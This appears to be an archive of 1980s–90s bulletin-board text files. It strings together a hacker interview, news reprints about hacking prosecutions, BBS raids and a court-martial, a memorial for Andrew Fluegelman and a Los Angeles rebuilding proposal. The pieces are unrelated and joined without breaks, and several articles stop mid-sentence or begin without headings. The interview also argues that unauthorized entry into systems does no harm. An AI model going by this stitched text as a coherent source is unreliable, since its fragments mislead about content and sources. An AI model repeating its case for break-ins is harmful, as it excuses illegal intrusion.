                      possible that many "reformed" hackers will
                      lose that special ingredient as they become
                      more and more a part of some other entity
                      that demands their very souls. But for
                      those who can resist this, or figure out a
                      way to incorporate "legitimacy" into their
                      hacker personalities without compromising
                      them, there are some very interesting and
                      fun times ahead. 

                 5. What kind of hacking do you do? 

                      My main interest has always been phones
                      and rarely does a day pass when I don't
                      experiment in some way with a phone
                      system, voice mail system, pay phone, or
                      my own telephone. I've always been
                      fascinated by the fact that we're only a
                      few buttons away from virtually anyone on
                      the planet and I hope that I never lose that
                      sense of marvel. 

                      One of the most amazing things I ever got
                      involved in was routing phone calls within
                      the network itself -- known as blue-boxing.
                      You can't do that as easily any more, but it
                      was a real fun way to learn how everything
                      was connected -- operators, services,
                      countries, you name it. And in the
                      not-too-distant past, there were so many
                      different sounds phones made depending on
                      where you were calling. Now they tend to
                      be standardized rings, busies, etc. But the
                      magic hasn't disappeared, it's just moved
                      on to new things ... satellite technology,
                      new phone networks and voice recognition
                      technologies. 

                      Many times these new technologies are
                      designed by the very people who were
                      hacking the old technologies. The result is
                      usually more security and systems that
                      know what people will find useful. While I've
                      spent a great deal of time playing with
                      phones, I get the same sense of fun from
                      computer systems and have invested lots
                      of time exploring the Internet. It would fill a
                      book to outline all of the hacker potential
                      that exists out there. And, of course,
                      there's radio hacking, which predates a lot
                      of the current technology. It's gotten to
                      the point where simply listening to a certain
                      frequency has become a challenge. It's
                      hard to believe that it's actually turned into
                      a crime to listen to some of these
                      non-scrambled radio waves. But this is the
                      price we pay when people with no
                      understanding of technology are the ones in
                      charge of regulating it. 

                 6. How much time do you spend at it a week? 

                      That's like asking how much time you spend
                      breathing. It's always with you, you do
                      more of it at certain times, but it's always
                      something that's going on in your head.
                      Even when I sleep, I dream from a hacker
                      perspective. 

                 7. Do you have a certain kind of site or
                 "target" sites that most attract you? 

                      We don't sit around with a big map and a
                      list of targets. In fact, we don't even sit
                      around together. Most hacking is done by
                      individuals who simply find things by
                      messing around and making discoveries. We
                      share that info and others add input. Then
                      someone tells the press and the
                      government that we're plotting to move
                      satellites and all hell breaks loose. 

                      I think most of us tend to be drawn to the
                      sites and systems that are said to be
                      impossible to access. This is a normal
                      human reaction to being challenged. The
                      very fact that we continue to do this after
                      so many of us have suffered so greatly
                      indicates that this is a very strong driving
                      force. When this finally becomes recognized
                      as a positive thing, perhaps we'll really be
                      able to learn from each other. 

                 8. What, in general, do you think attracts
                 people to hacking? 

                      People have always been attracted to
                      adventure and exploration. Never before
                      have you been able to get this without
                      leaving your house and without regard to
                      your skin color, religion, sex, or even the
                      sound of your voice. On the Internet,
                      everyone is an equal until they prove
                      themselves to be a moron. And even then,
                      you can always start over. It's the ability
                      to go anywhere, talk to anyone, and not
                      reveal your personal information unless you
                      choose to -- or don't know enough not to
                      -- that most attracts people to the hacker
                      culture, which is slowly becoming the
                      Internet culture. 

                      We find that many "mainstream" people
                      share the values of hackers -- the value of
                      free speech, the power of the individual
                      against the state or the corporation, and
                      the overall sense of fun that we embrace.
                      Look in any movie where an individual is
                      fighting a huge entity, and who does the
                      audience without exception identify with?
                      Even if the character breaks the rules, most
                      people want him/her to succeed because
                      the individual is what it's all about. 

                 9. Do you know enough hackers personally to
                 know what personality traits they share, if
                 any? 

                      Hackers come from all different backgrounds
                      and have all kinds of lifestyles. They aren't
                      the geeks you see on television or the
                      cyberterrorists you see in Janet Reno news
                      conferences. They range in age from under
                      10 to over 70. They exist in all parts of the
                      world, and one of the most amazing and
                      inspiring things is to see what happens
                      when they come together. It's all about
                      technology, the thrill of discovery, and
                      sharing information. That supersedes any
                      personality issues that might be an issue in
                      other circumstances. 

                 10. Do you think hackers are productive and
                 serve a useful purpose? 

                      I think hackers are necessary, and the
                      future of technology and society itself
                      (freedom, privacy, etc.) hinges on how we
                      address the issues today that hackers are
                      very much a part of. This can be the
                      dawning of a great era. It can also be the
                      beginning of true hell. 

                 11. What percentage would you say are
                 destructive as opposed to those in it out of
                 intellectual curiosity or to test their skills? 

                      This raises several points that I feel
                      strongly about. For one thing, hacking is
                      the only field where the media believes
                      anyone who says they're a hacker. Would
                      you believe someone who said they were a
                      cop? Or a doctor? Or an airline pilot? Odds
                      are they'd have to prove their ability at
                      some point or say something that obviously
                      makes some degree of sense. But you can
                      walk up to any reporter and say you're a
                      hacker and they will write a story about
                      you telling the world that you're exactly
                      what you say you are without any real
                      proof. 

                      So every time a movie like "Hackers" comes
                      out, 10 million people from AOL send us
                      e-mail saying they want to be hackers, too,
                      and suddenly, every 12-year-old with this
                      sentiment instantly becomes a hacker in
                      the eyes of the media and hence, the rest
                      of society. You don't become a hacker by
                      snapping your fingers. It's not about getting
                      easy answers or making free phone calls or
                      logging into someone else's computer.
                      Hackers "feel" what they do, and it excites
                      them. 

                      I find that if the people around you think
                      you're wasting your time but you genuinely
                      like what you're doing, you're driven by it,
                      and you're relentless in your pursuit, you
                      have a good part of a hacker in you. But if
                      you're mobbed by people who are looking
                      for free phone calls, software or exploits,
                      you're just an opportunist, possibly even a
                      criminal. We already have words for these
                      people and it adequately defines what they
                      do. While it's certainly possible to use
                      hacking ability to commit a crime, once you
                      do this you cease being a hacker and
                      commence being a criminal. It's really not a
                      hard distinction to make. 

                      Now, we have a small but vocal group who
                      insist on calling anyone they deem
                      unacceptable in the hacker world a
                      "cracker." This is an attempt to solve the
                      problem of the misuse of the word "hacker"
                      by simply misusing a new word. It's a very
                      misguided, though well-intentioned, effort.
                      The main problem is that when you make up
                      such a word, no further definition is
                      required. When you label someone with a
                      word that says they're evil, you never really
                      find out what the evil was to begin with.
                      Murderer, that's easy. Burglar, embezzler,
                      rapist, kidnapper, all pretty clear. Now
                      along comes cracker and you don't even
                      know what the crime was. It could be
                      crashing every computer system in
                      Botswana. Or it could be copying a single
                      file. We need to avoid the labeling and start
                      looking at what we're actually talking
                      about. But at the same time, we have to
                      remember that you don't become a hacker
                      simply because you say you are. 

                 12. Do people stay in hacking a long time, or
                 is it the kind of thing that people do for a few
                 years and then move on to something else? 

                      It can be either. I tend to believe that it's
                      more of a philosophy, a way of looking at
                      something. When you have the hacker
                      perspective, you see potential where others
                      don't. Also, hackers think of things like
                      phones, computers, pagers, etc., as toys
                      and things to be enjoyed whereas others
                      see work and responsibility and actually
                      come to dread these things. That's why
                      hackers like to hold onto their world and not
                      become part of the mainstream. But it
                      certainly can and does happen. 

                 13. What is the future of hacking? 

                      As long as the human spirit is alive, there
                      will always be hackers. We may have a hell
                      of a fight on our hands if we continue to be
                      imprisoned and victimized for exploring, but
                      that will do anything but stop us. 

                 14. Given increased attention to corporate
                 and government security, is it getting
                 tougher to hack or not? 

                      Hacking isn't really about success -- it's
                      more the process of discovery. Even if real
                      security is implemented, there will always
                      be new systems, new developments, new
                      vulnerabilities. Hackers are always going to
                      be necessary to the process and we're not
                      easily bored. 

                 15. Is the possibility of being identified and
                 even prosecuted an issue for most hackers? 

                      Hackers make very bad criminals. This is
                      why we always wind up being prosecuted.
                      We don't hide very well or keep our mouths
                      sealed shut to protect corporate or
                      government interests. But the same
                      security holes would exist even if we
                      weren't around, so I think the hackers
                      should be properly seen as messengers.
                      That doesn't mean that you should expect
                      them to just hand over all of their
                      knowledge -- it's important to listen and
                      interpret on your own, as any hacker
                      would. 

                 16. Are there hackers who are up for hire?
                 What are they paid? Who hires them, and for
                 what? 

                      Just as you can use hacker ability to attain
                      a life of crime, you can use that ability to
                      become a corporate success. Some are
                      able to hold onto their hacker ideals.
                      Others, sadly, lose them. It's especially
                      hard when young people who haven't
                      worked it all out yet are approached and
                      tempted with huge amounts of money by
                      these entities. It can be very hard to resist
                      and the cost is often greater than
                      anticipated. 

                 17. Have you had any contact with people
                 you consider cyberterrorists? Do you endorse
                 what they do? 

                      In all of the time I've been in the scene,
                      which is a pretty long time, I've never come
                      across anyone I consider to be a
                      "cyberterrorist," whatever that is. Most
                      people who talk of such creatures either
                      have something to sell or some bill to pass.
                      This is not to say that such a concept is
                      impossible. But I believe the current
                      discussions aren't based in reality and have
                      very suspicious ulterior motives. 

                 18. What about the people who hack into
                 Pentagon sites? Do you think they should be
                 punished? 

                      According to the Pentagon, there is no risk
                      of anything classified being compromised
                      because it's not on the Internet. If they
                      were wrong, I would like to see someone
                      prove that. If a non-classified site is
                      hacked, I don't see the harm unless
                      something is damaged in some way.
                      Remember, the security hole was already
                      there. If a hacker finds it, it's far more likely
                      the people running the system will learn of
                      the hole. If a criminal or someone with an
                      ulterior motive (espionage, etc.) finds the
                      hole first, it's likely to remain secret for
                      much longer and the harm will be far
                      greater. 

                      While you may resent the fact that some
                      14-year-old from Topeka proved your
                      security sucks, think of what could have
                      happened had you not learned of this and
                      had someone else done it instead. I'm the
                      first to say that people who cause damage
                      should be punished, but I really don't think
                      prison should be considered for something
                      like this unless the offender is a true risk to
                      society. The great majority of these cases
                      do not involve damage or vandalism, a fact
                      that largely goes unreported. What people
                      have to remember is that most of the time,
                      this is simply an example of kids being kids
                      and playing games like they have always
                      done. 

                      Obviously, the tools have changed, but
                      that's really not something the kids are
                      responsible for. If some kid somewhere can
                      access your medical records or your phone
                      records, he or she is not the one who put
                      them there. The true violator of your
                      privacy is the person who made the
                      decision to make them easily accessible. 

                 19. Your real name is Eric Corley. Why do you
                 use the name Emmanuel Goldstein? 

                      I believe everyone should be given the
                      opportunity to name themselves. That
                      name should reflect something about who
                      you are and what you believe in and stand
                      for. Emmanuel Goldstein is that for me, and
                      for those who want to learn why, get a
                      copy of George Orwell's "1984" and see for
                      yourself. Interestingly, our first issue of
                      2600 was published in January 1984. A
                      complete coincidence. 

File: NEWSWEEK - TEACHING HACKERS ETHICS
 Read 6 times

==============================================================================
= Teaching Hackers Ethics = Newsweek/January 14, 1985 by Dennis A.  Williams =
= with Richard Sandza	  =		 [Word Processed by BIOC Agent 003]  =
==============================================================================

     The parents of "Echo Man," 16, "Thr ee Rocks," 15, and "Uncle Sam," 17,
probably thought they were in their rooms doing homework.  Instead, the
Burlingame, Calif., teen-agers were programming their Apples to scan the
Sprint telephone-service computers for valid access numbers, which they used
to make free calls.  The hackers then posted the numbers on an electronic
bulletin board, so others could share in the spoils.  That was their undoing.
Local police, who had been monitoring the bulletin board, raided each of the
hackers' homes last month and found enough evidence to charge them with felony
theft and wire fraud.  But the police chose not to prosecute if the youngsters
agreed to pay Sprint for the calls and write 10-page papers -- on typewriters,
no less -- on the evils of computer hacking.

Several years after the introducti on of computers into the nation's
classrooms, teachers are realizing they have a twofold lesson to teach:
computer use and computer abuse.  But few schools have initiated the second
part of the program.  "Many schools are trying to focus on the issue of
ethnics," says Jeff Levinsky of the Stanford Institute on Microcomputers in
Education.  "Still, there's nowhere near enough of that." One reason is that
most schools are still trying to catch up with the changing technology, which
leaves little time for thinking about its moral implications.  But some
teachers try to emphasize high-tech ethics in their computer classes.  David
Daniels, a seventh-grade teacher in Houston, devoted a week to discussing the
movie "WarGames," which illustrates both the allure and the dangers of
computer trespassing.  Others point out the potential consequences of computer
mischief, such as expulsion from school, incurring lawsuits or causing
personal harm, say, by tampering with a hospital's computer.

Many hackers are already proficient users by the time they get computer courses
in school, and some teachers may feel it's too late to keep them from
tampering.  "We have lots of kids who are way ahead of the teachers," says
Larry Hawkinson, a retired Silicon Valley teacher.  Some schools, in fact,
seek to exploit that expertise by challenging students to break into the
school's computer; the process helps the school design better safeguards for
its own system but leaves students more capable of breaking into others.
Teachers themselves are often guilty of software piracy, and frequently convey
only the most pragmatic notions of computer propriety.	"Computer instructors
don't teach lofty things like the difference between right and wrong," charges
Jeanne Dietsch of Talmist, Inc., a Chicago computer-consulting firm.  "They
just teach technical things like how to program in codes to protect your own
privacy."

Power:	One soulution may be to give hackers the responsibility for monitoring
electronic snooping.  At Lincoln-Sudbury Regional High School in Massachusetts,
five student "superusers" control the school's computer system.  "The group has
been very strict about policing its own actions," says adviser Paul Goldenberg.
"They are almost nauseatingly moral." Senior superuser Toby Mintz admits that
members used to peruse the records "just to see what our grades were." But he
says they never changed anything.  "We knew we weren't doing anything harmful,"
he says, "but we realized we were doing something wrong."

[Courtesy of Sherwood Forest ][ -- (914) 359-1517]
-----End of File

Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open
R

24/125: The Fading Hacker Mystique
Name: Mac??? #95 @5211
Date: Sat Aug 24 22:06:32 1991
From: Blitzkrieg (Louisville, Ky.)


[FORMATTED FOR 80 COLUMNS
 AND MIXED CASE]

The Fading Hacker Mystique:  No Longer Just Pests

CORPORATIONS TURNING UP THE HEAT ON HI-TECH INTERLOPERS

The blurred line between computer hacking and computer crime has never been
more unclear.  With few precedents to guide them, criminologists, legal
scholars, and computer users are scrambling to define the boundaries of
acceptable PC hacking.
     That's not an easy job, but a resolution of the issue has never been more
pressing--the prosecution of hackers charged with illegally infiltrating
private data banks is on the upswing.
     Increasingly, federal authorities are pursuing hacker related crimnes,
according to New York State Police Senior Investigator Don Delaney.
     "[Hacking] is causing companies to lose a lot of money," said Delaney, who
made his comments at a recent conference on computer privacy hosted by New
York University.
     The hacker mystique doesn't play at all well in corporate America, where
MIS managers take dim views of outsiders busting into their data networks, and
they often treat security breaches as crimes.
     The most famous case occurred a couple of years ago, when Robert Morris
Jr., the son of a famous computer scientist, was put on trial and convicted
after a rogue virus he invented paralyzed a nationwide computer network.
     More recently, a 17-year-old New York student was charged with a
misdemeanor for cracking the code in Sprint's extensive UNIX networks.  The
apprentice hacker, who goes by the code name "Phiber Optic," maintains that he
turned to hacking because his school didn't cover the computer subjects he was
interested in.  Even now, he still believes that private computer networks
remain fair game.
     Intellectually curious or hi-tech felons?
     Hackers are rarely "just playing," Delaney said.  Often, they've been
involved in crimes such as stealing credit cards or accessing toll-free phone
numbers.
     Ultimately, the answer will be colored by what side of the debate you
take, but if Delaney's position reflects a wider hard-line attitude, hackers
should take note.
     "Every company has the rihgt to have its computer networks left alone," he
said.

  --[  Taken from the August, 1991 issue of Computer Shopper on page 128.  ]--
_______________________________________________________________________________ 

     Re-typed and uploaded by MAC??? of The NATO Association.

 - End of File -




Read:(1-125,^24),? :Date: Sun, 14 Jun 92 09:18:27 CST
From: MackL <Mclaugh@psicom2.edu>
Subject: File 7--PC BBS Raided by FBI (reprint)

                 "PC Bulletin Board Hit by FBI Raid"
                     By Josh Hyatt (Boston Globe)
           From:   (Chicago Tribune, June 14. Sect 7, p 3)

BOSTON--In one of the first reported crackdowns of its kind, six FBI
agents raided a computer bulletin board based in a Millbury, Mass.,
home last week. Authorities said the bulletin board's operator had
been illegally distributing copyrighted software.

Executing a criminal search warrant, the agents seized several
computers, six modems and a program called PC Board, which was used to
run the bulletin board. Authorities also seized documents that listed
users of the service.

No arrests were made, according to the Software Publisher's
Association, a trade group that brought the case to the FBI's
attention. The association estimates that, as of March, the bulletin
board had distributed $675,000 worth of copyrighted software; software
pirates, it says, annually steal as much as $12 billion this way.

The FBI will not comment on the case except to confirm that a raid had
taken place and that the investigation is continuing. The alleged
operator of the bulletin board, Richard Kenadek, could not be reached
for comment.

Around the same time as the raid, the software association filed a
civil lawsuit against Kenadek, charging him with violating copyright
laws. Ilene Rosenthal, the group's director of litigation, said that
"the man had incriminated himself" through various computerized
messages.

"There's plenty of evidence to show that he was very aware of
everything on his bulletin board," she said.

Bulletin boards let personal computer users access a host computer via
modems. Typically, participants exchange information regarding
everything from computer programs to tropical fish.  They may also,
for example, obtain upgrades of computer programs.

The association said its own four-month investigation revealed that
this bulletin board, called Davy Jones Locker, contained copies of
more than 200 copyrighted programs.

Rosenthal said users also were encouraged to contribute copyrighted
software programs for others to download or copy.

According to Rosenthal, subscribers paid a fee, $49 for three months
or $99 for one year. She said Davy Jones Locker had nearly 400 paying
subscribers in 36 states and 11 foreign countries.
             Colonel guilty of sending porn over computer

Associated Press

SAN ANGELO -- The former commander of Goodfellow Air Force Base was
convicted in a court martial Monday of sending obscene material via
his home computer.

A jury of four men and one woman, all Air Force colonels, deliberated
about two hours before returning guilty verdicts on all counts again
Col. James Maxwell.

He was convicted of transmitting obscene material via home computer,
of transmitting child pornography through his computer and using
indecent language with a junior Air Force officer.

Maxwell, a 26-year Air Force veteran, now faces a possible 16-year
prison sentence and loss of his military retirement benefits.

Charges were filed against Maxwell after the FBI found his name among
users of an on-line computer network who accessed computer-generated
pornographic images of children.

Maxwell also was said to have used the computer network to inquire
about the location of homosexual meeting places.

Maxwell's attorney had sought to have the charges dropped on grounds
his transmissions on the computer from the privacy of his home were
protected under the constitution.

But the trial judge, Col. Donald Weir of Randolph Air Force Base,
allowed the charges to stand last week, ruling that freedom of speech
can be limited when it involves conduct unbecoming an officer.

"That the writings were private between consenting adults, that they
may have been welcome doesn't place them under the judicial umbrella
of a constitutional protected condition," Weir had ruled.

Weir dismissed a count alleging Maxwell had disgraced the Air Force by
allegedly using electronic mail to ask about homosexual bars and child
pornography.

Maxwell, 48, was removed from command at the Goodfellow Air Force Base
training center last summer after the charges were filed.

+++++++++++++++++++++

COMMENT: Looks to me like this thing is full of red flags. Isn't it
coincidental that the story breaks just as there's a flap over gays in
the military?!

And where it says "the FBI found his name among users of an on-line
computer network who accessed computer-generated pornographic images
of children", one might ask what network? what was the FBI doing
there? how did the images get there? how did the FBI think to track
them? who else is getting snared? civilians? were the images really
"computer-generated" or just scanned?

It's enough to restore one's healthy paranoia...
30 Arrests In Silicon Valley Computer Parts Sting 01/13/93
SANTA CLARA, CALIFORNIA, U.S.A., 1993 JAN 13 (NB) -- The
computer and software industries are a high source of revenue
for California. But they also afford a good income for the
criminal elements. An undercover investigation into stolen computer
parts by local and federal authorities and the FBI in Silicon Valley
has resulted in 30 arrests, according to a published report.

UPI reports the operation resulted in the recovery of more than $3.6
million in cash and stolen property and was the result of a 4.5-month
investigation called "Operation Gray Chip." A total of $2.1
million was recovered in cash and another $1.55 million in
stolen high-tech equipment, the report says.

UPI quotes Santa Clara Police Sgt. Mark Kerby as saying: "The
trade in stolen computer parts is one of the largest crime
problems in the Silicon Valley. So I'd say we just scratched the
surface. But hopefully the publicity this case will receive
will serve as a warning."

Various locations, from parking lots to restaurants, were used
to stage the stings. The arrests occurred after cash changed
hands. The largest transaction involved $250,000 in exchange
for 5, 000 Intel computer parts.

In December of 1991, Newsbytes reported that The Acer
Group had $250,000-worth of Acer 386 notebook computers
stolen on the way to the company's San Jose, California,
factory.

In February of 1992, Newsbytes reported that PC Force,
a computer retailer in California's City of Industry was one of
20 to 30 Los Angeles area businesses hit by a RAM memory thief.
In that instance, a man came into the store on the Martin Luther

 
        Armed with search warrants, the agents came early Wednesday morning to
15 middle-class homes throughout the U.S., peering under beds, pulling out
drawers, seizing print-outs and floppy discs.  In California, they simulta-
neously struck four homes within a 40-mile radius of Los Angeles.  Wayne
Correia, 17, of Irvine, Calif., looked up at 6:15 a.m. to find a man breaking
in through his bedroom window.  "FBI," the figure announced.  "And that comp-
uter's mine."
 
        The raids on the homes of young compuer enthusiasts in 13 cities were
part of a federal investigation into reports of widespread abuse of computer
networks.  For months authorities have been waging a quiet war of nerves with
the thousands of teen-agers who use their home terminals and telephone hookups
to dial into larger systems across the country.  Most are careful to do no
harm, but for those bent on doing damage, the opportunities are boundless.  One
14-year-old brags that he penetrated a computer belonging to a brokerage firm
and erased a group of commodity trading accounts.  Particularly vulnerable are
the 1,200 computer systems that can be reached through a single telephone call
to GTE Telenet, a network based in Vienna, Va.  Last summer the FBI singled out
for investigation a gang of Milwaukee-area youths who had used Telenet to enter
a number of different systems, including unclassified Defense Department comp-
uters and a machine monitoring the treatment of cancer patients in a New York
City hospital.
 
        Last week's crackdown was the most dramatic to date.  Phone taps and
electronic "sting" operations were used to trap the suspects.  To prevent them
from warning their friends, the raids were carefully coordinated.  Indeed, news
of the FBI strike was quickly flashed across the country through messages post-
ed on computer bulletin boards, and some youngsters reportedly rushed to erase
discs and burn files.  Though no charges have been filed yet, the Government,
by going after the microkids in a style more commonly used for archcriminals,
risked turning the youngsters into instant heroes.  Nervertheless, while such
tamperings may be born of curiosity and high spirits, they have serious con-
sequences and are increasingly dangerous.  Four of the California youths who
were raided held a press conference at their high school to explain how the
passwords they used for unauthorized break-ins had been provided by an anony-
mous computer-network buddy.  "I was kind of naive," said David Hill, 17, of
Irvine.  "I thought, oh boy, how neat."  After the FBI action last week, no one
smart enough to get into this sort of trouble should be able to claim such
ingenuousness again.
 
Typed by Uncle Fester
Presented to you by The Dragon's Lair    10 megs..................516-374-5071
 


==)--- P TO PAUSE S TO STOP ---(==

                        ANDREW FLUEGLEMAN: IN MEMORIAM
                               by Kevin Strehlo

The following is an excerpt from NEWSBYTES (dated 7/30/85), an electronic
publication available on The Source (tm).


(Editor's note: This is the full, unedited transcript of Kevin's last "PC
Tales" column for InfoWorld.  Kevin resigned because the editors saw the last
few paragraphs unfit for publication.  NEWSBYTES does not.  So with Kevin's
permission, we post his eloquent and moving tribute to Andrew.)



       The voice on the tape is elusive.  Dennis Erokan and Mary Eisenhart
of "Microtimes" conducted the interview in the cafeteria at the last San
Francisco Mac Expo, and Andrew Fluegelman is barely audible over the din.  Yet
the animation behind the voice comes through.

  "I was driving across the Golden Gate Bridge," the voice says, "which I
think is a power point -- I have more inspirations driving across the Golden
Gate Bridge [laughs] -- and as I was pulling into the toll plaza the word
"freeware" popped into my head, and this whole idea of user-supported
software: pass it around, don't make people pay for it, let them try it...."

       Freeware: it sounds like a share-the-wealth concept left over from the
Sixties, sort of what you'd expect from a guy who had given up law practice to
work as an editor for "The Whole Earth Catalog"  and who put together a book
called "The New Games" about sports in which everybody won.

       But the voice reveals that his Freeware plan was the only real option
if he was to profit from PC Talk, the communications program he had written
for his book publishing business.  Fleugelman was tired of the hassles of
publishing; this seemed a better way.

       PC Talk's documentation describes Freeware as "an experiment in
economics more than altruism."  Free distribution of software and voluntary
payment for its use eliminated marketing and advertising costs; the question
was, would it also eliminate the program author's income?

       The voice on the tape says the arrival of the first check in the mail
was unbelievable, but now, with an estimated 100,000 copies of PC Talk in use,
it takes two full-time people to handle the checks mailed daily to Headlands
Press in Tiburon.  It is obvious: the experiment is a success.

       David Bunnell and Jim Edlin had no idea what seed they were about to
plant as they hauled their heavy box of iron, glass and silicon chips across
Jackson Square.  The once rowdy area of San Francisco, from whence many an
unwary sailor was recruited for voyages to Shanghai with a swift bang on the
head, was now a chic location for business.  The brick buildings that had
survived the great 1906 quake housed designer showrooms, architects and Andrew
Fluegelman's Headland's Press, but nary a personal computer.

       Fluegelman was intrigued by the Sol 20 computer they plopped on his
desk.  As they demonstrated Electric Pencil, he realized how useful it could
be in his business, which was to conceptualize and package the work of writers
and illustrators and sell it to major publishers in New York.

       Edlin and Bunnell were there to propose a book that would take a broad,
philosophic look at the coming sociological impacts of personal computers.
Theory was fine, but Fluegelman wanted something more substantive and
participatory that would explain what people could do with the technology.
They couldn't agree; no deal was struck.

       But Fluegelman had the bug; he ended up selling a book on computers for
writers and bought one of the first thousand IBM PCs shipped.  The only
software available for the PC was BASIC and the Easywriter word processor; the
need to exchange chapters with his coauthor on the book lead Flugelman to
write PC Talk.

       The connection with Edlin and Bunnell was renewed when they founded PC
magazine.  Fluegelman, as one of the few business people actually using a PC,
was a perfect subject for a first issue profile.  He was also a user of
Easywriter, the only application program then available for the PC, and they
asked him to write a review of it.

       Fluegelman made a name for himself with that review.  He thought it was
terrible and said so.  PC ran it without changing a word, under Fluegelman's
headline: "Not so Easywriter." John Draper, the program's author, says
Fluegelman was right: the program was released before it was ready.  Thus did
Fluegelman begin his long involvement with spreading the word, good and bad,
about personal computing.

       Fluegelman was fond of saying the amount of code doing the work in PC
Talk was tiny compared to the amount that was just there to make life
pleasant.  When it came to the program that dictated Fluegelman's life, the
work and pleasure segments seemed intertwined.

       Fluegelman worked hard.  He wrote PC Talk late at night -- "abandoning
all bodily functions for a month," says the voice on the tape -- while still
publishing books during the day.  Later, when Bunnell founded PC World to
compete with PC, Fluegelman agreed to become the new magazine's editor and
worked for months on end, stopping only to eat and sleep.

       On the tape, the voice talks about the intense pleasure and
rejuvenation Fleugelman got from his involvement with computers.  "I have
never been as socially involved, as interconnected with as many different
kinds of people, as when I started getting involved with computers," it says.

       Those people lucky enough to interconnect with Fluegelman are having a
hard time figuring out what happened.  His friends talk about the strong
medication he was taking for Colitis, a drug that has been known to cause
depression and mental confusion.  They try to connect the voice that haunts
them to the Fluegelman who was acting a bit strangely the last few days before
he disappeared.

       Fluegelman had been missing for about a week when his car was found
parked near the toll plaza on the Marin County side of the Golden Gate Bridge,
the site of so many of his moments of inspiration.  Friends say a suicide note
was found inside.  His family held a memorial service in New York the
following Sunday.

       Yet, as this is being written, no body has been found.  Police still
list Fluegelman as a missing person.  Friends hope against hope that he has
been shanghaied, that someday he will return.

       The small voice on the tape talks about the future.  "It's great to go
along for 40 years and still find your life changing and new things
happening," the essence of Fluegelman says.  "It makes you look forward to
what's going to happen when you're 60, what's going to happen when you're 80."

       With that, the tape ends.

                       --- End of NEWSBYTES article ---
______________________________________________________________________________


Users of the IBM PC and PC oriented bulletin boards owe much to Andrew
Fluegelman... The Freeware (tm) concept, making XModem a defacto file transfer
protocol and the quality found in the early PC World issues.

In the spring of 1982, I first added communications capabilities to my "still
wet behind the ears" IBM PC.  I did what any PC user was forced to do... went
to Computerland, plunked down $220 for a Tecmar board with two serial ports
and a parallel port, $279 for a Hayes Smartmodem (300 baud), and $50 for
IBM's Asynchronous Communications Support software, and with a heavy limp
began to communicate with my company's mainframe.

Sometimes I even managed to transfer a text file to or from the system.  Each
time I called, I had to set the communications parameters, and type the
dialing command and phone number to the SmartModem.  Imagine my delight when
in the fall, a friend gave me a copy of PC-Talk II.  He had seen it mentioned
in a magazine article, and had sent Andrew a blank formatted disk, and a
return mailer.  No money.  A donation of $25 was requested if you liked the
program.

Was it a slick program.  No cumbersome menus to go through.  Just type Alt-D
and up came a list of remote system phone numbers and their settings for
communications parameters.  Type in a 1 or 2 digit number and get connected to
the remote system.  It stripped out those funny characters the mainframe sent.
You could even send and receive text files, just type Alt-T to transmit, Alt-R
to receive.

That magazine article also mentioned something called an electronic bulletin
board.  A fellow by the name of Wes Merchant was running a PC information
exchange on his Radio Shack computer for the Capitol PC Users Group.  By mid-
winter we were calling his board, and boards run by Gene Plantz in Chicago,
and Rich Schinnell in Rockville, MD.  We could receive COM & EXE program files
that had been converted to an ASCII format for transmission.  Sometimes we
could convert them back to the original files and get the programs to run.

Some of the ASCII files we received were BASIC merge files to add new
capabilities to PC-Talk.  The boards were really getting busy, and the patch
that added automatic redial was a welcome addition.  Then there was this thing
called XModem.  Gene Plantz had it working on his board.  I think the HOSTCOMM
boards had also added it by then.  We installed the patch, and could move COM
& EXE files without having to translate them to some other format, just
download and run.

In the process of modifying the program, I began to get a little insight into
how to program in BASIC.  Andrew had used techniques and features of PC-BASIC
in the program that other programmers and magazine articles were just
beginning to recognize.  In particular, his technique for trapping the PC's
extended keyboard set (Alt-D, Alt-R, et al) was leading the field.

By the spring of 1983 we had compiled PC-Talk II and some of the
modifications.  By late spring we had received a copy of PC-Talk III.  Andrew
had collected all of the modifications, resolved the conflicts between them,
and compiled the program.  It ran circles around most of the commercial
competition.  He had increased his requested contribution to $35.

Larry Jordan reviewed twelve communications packages in PC World, Volume 1,
Number 5 (published in the summer of 1983).  Larry said, "PC-Talk has become
the benchmark that other PC communications packages are measured against."  Of
the twelve packages reviewed, eight had the capability to transmit binary (COM
& EXE) files.  Three of those used the XModem protocol, the others used
proprietary protocols.  Apparently the vendors hoped to force the public to
use their packages at both ends to transmit binary files.  A few folks didn't
think too much of that.

That copy of PC World was an excellent issue on communications.  Andrew
Flugelman was the editor.

Larry, by then, had added XModem to RBBS-PC.  It was being distributed by the
Capitol PC Users Group's Software SIG, and was available on Compuserve.  A
friend of mine downloaded it, (using PC-Talk of course) and in July of 1983 I
began operating an electronic bulletin board.

Shortly after that, word leaked out that Andrew was actually making money off
of PC-Talk, and the Freeware concept became recognized as a reasonable
alternative to commercial software distribution methods.

Over the next year, most vendors came around and added XModem to their
packages.  There were an awful lot of people with whom their customers hadn't
been able to exchange files.

In the spring of 1984, MacWorld premiered.  Andrew Flugelman was the Editor-
in-Chief.  For me, that was the explanation of why PC World's quality had
declined in the preceeding months.  I had let my charter subscription expire.

PC-Talk has been patched and revised many times over.  A few months back,
Andrew discontinued distribution via a blank floppy and return mailer.  In the
fall of last year, John Friel III released a program called QModem.  It
mimicked the PC-Talk structure, but took advantage of the features of Turbo
Pascal to offer more speed, and a cleaner user interface.  I've been using it
since last November.

There are so many good communications products for the IBM PC on the market
today, it is hard to remember a time when we didn't have products to fill the
need.  Andrew's PC-Talk was the best tool we had for a long time.  If I had
had to do without it, I doubt that I would have been attracted to PC
communications to the point that I have been.  I have an even more difficult
time imagining the PC without the Freeware alternative.  Thank you, Andrew.

                                        Bob Ketcham

 



Library Menu #9




<A>Trojan Horses
<B>New Atari Products
<C>Problems in the Making
<D>BBS Oper Standards
<E>Flugelman-In MemoriamThe following article may be found in the June 1,1992 issue of the
Nation.  It is in the regular Alexander Cockburn column entitled
BEAT THE DEVIL.  It is an excerpt of the BLOODS/CRIPS proposal which
is all that was contained in the magazine.  Why its existence has
proven so elusive is a mystery.  However, comments after here's the
proposal:

BLOODS/CRIPS PROPOSAL FOR LA'S FACE-LIFT ($2 BILLION)

Every burned and abandoned structure shall be gutted.  The city will
purchase the property...and build a community center.  If the
structure is on a corner lot or is a vacant lot, the city will build
a career counseling center or a recreation center, respectively.

All pavements/sidewalks in Los Angeles are in dire need of
resurfacing... Our organization will assist the city in the
identification of all areas of concern.                                                                                                                                                                                                                                                            ..

All lighting will be increased in all neighborhoods.  Additionally,
lighting of city streets, neighborhood blocks and alleyways will be
amended.  We want a well-lit neighborhood.  All aleys shall be
painted white or yellow...
